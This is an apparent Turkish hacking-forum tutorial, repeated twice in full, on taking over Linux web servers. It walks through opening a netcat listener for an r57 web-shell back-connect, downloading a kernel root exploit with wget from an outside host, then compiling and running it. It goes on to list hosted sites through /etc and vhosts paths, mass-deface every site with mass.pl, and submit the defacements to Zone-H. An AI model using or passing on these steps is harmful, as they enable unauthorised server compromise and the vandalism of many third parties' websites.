JusTic4
Spys-Z
Merhaba Gençler. Bu gün size Linux Server Rooting'i Resimli Anlatıcam Anlatıcam.
1) netcat
2) r57 shell
3) mass.pl
4) zone-h.pl
5) En çok kullandığınız bir index
başlat çalıştıra cmd yazıp enter'lıyoaruz.Karşımıza siyah Komut sistemiekranı gelecek bu ekrana nc -v -l -p 443 yazalım (443 yazmak için 443 portunuzun açık olması gerekir.)
evet ornek olarak r57 shellimizde de back connect yerine 443 yazıyoruz
shellimizde de bu yazı çıktıktan sonra komut ekranına donelim baglandıkmı bakalım
Evet bağlandık serverimiz 2007 sürümü 2.6.22 exploitimizi googledan veya milw0rm demek isterdim ama milw0rm kalmadı.Exploit DB türü sitelerden dan arayıp bulduktan sonra
serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home/*******/public_html/tmp dizinindedir
ikinci verdiğim joomla sitelerdedir.
wget komutuyla exploiti server upload edelim ornek olarak
wget http://xxx.com/2.6.18
exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur. attıgımız exploiti derleyecegiz şimdi;
gcc -o root 2.6.18
chmod ayarı yapacagız
chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra
./root diyerek exploitimizi çağırıyoruz (resimde gösterdiğim gibi)
bazen hemen bazen biraz bekledikten sonra cevap gelir.
evet serverimiz rootlandı whoami komutuyla bunu görüyoruz.
uid=0 ı gorduk şimdi musait bi yere indeximizi ve mass.pl yi atalım
serverdakileri siteleri gormek içinse çok çeşitli yol var
komutlar;
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/ gibi
bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra
ls "LS" yani komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hacked.txt diğer kayıt edin.""perlin Programı yüklü olmalısı gerekir."
kayıt ettikten sonra komut ekranında mass deface işlemine gecelim.
önce ekrana mass.pl yazıp nasıl çalıştığını kontrol ediyoruz. sonra uygulamaya geçiyoruz.mass deface zaman alabilir sabırlı olmak gerek
işlem bitince all homepages deface diye bir yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
cd..
cd..
cd perl
cd bin
perl zoneh.pl hacked.txt JusTic4 yazıp enter'a basıyoruz.
1) netcat
2) r57 shell
3) mass.pl
4) zone-h.pl
5) En çok kullandığınız bir index
başlat çalıştıra cmd yazıp enter'lıyoaruz.Karşımıza siyah Komut sistemiekranı gelecek bu ekrana nc -v -l -p 443 yazalım (443 yazmak için 443 portunuzun açık olması gerekir.)
evet ornek olarak r57 shellimizde de back connect yerine 443 yazıyoruz
shellimizde de bu yazı çıktıktan sonra komut ekranına donelim baglandıkmı bakalım
Evet bağlandık serverimiz 2007 sürümü 2.6.22 exploitimizi googledan veya milw0rm demek isterdim ama milw0rm kalmadı.Exploit DB türü sitelerden dan arayıp bulduktan sonra
serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home/*******/public_html/tmp dizinindedir
ikinci verdiğim joomla sitelerdedir.
wget komutuyla exploiti server upload edelim ornek olarak
wget http://xxx.com/2.6.18
exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur. attıgımız exploiti derleyecegiz şimdi;
gcc -o root 2.6.18
chmod ayarı yapacagız
chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra
./root diyerek exploitimizi çağırıyoruz (resimde gösterdiğim gibi)
bazen hemen bazen biraz bekledikten sonra cevap gelir.
evet serverimiz rootlandı whoami komutuyla bunu görüyoruz.
uid=0 ı gorduk şimdi musait bi yere indeximizi ve mass.pl yi atalım
serverdakileri siteleri gormek içinse çok çeşitli yol var
komutlar;
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/ gibi
bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra
ls "LS" yani komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hacked.txt diğer kayıt edin.""perlin Programı yüklü olmalısı gerekir."
kayıt ettikten sonra komut ekranında mass deface işlemine gecelim.
önce ekrana mass.pl yazıp nasıl çalıştığını kontrol ediyoruz. sonra uygulamaya geçiyoruz.mass deface zaman alabilir sabırlı olmak gerek
işlem bitince all homepages deface diye bir yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
cd..
cd..
cd perl
cd bin
perl zoneh.pl hacked.txt JusTic4 yazıp enter'a basıyoruz.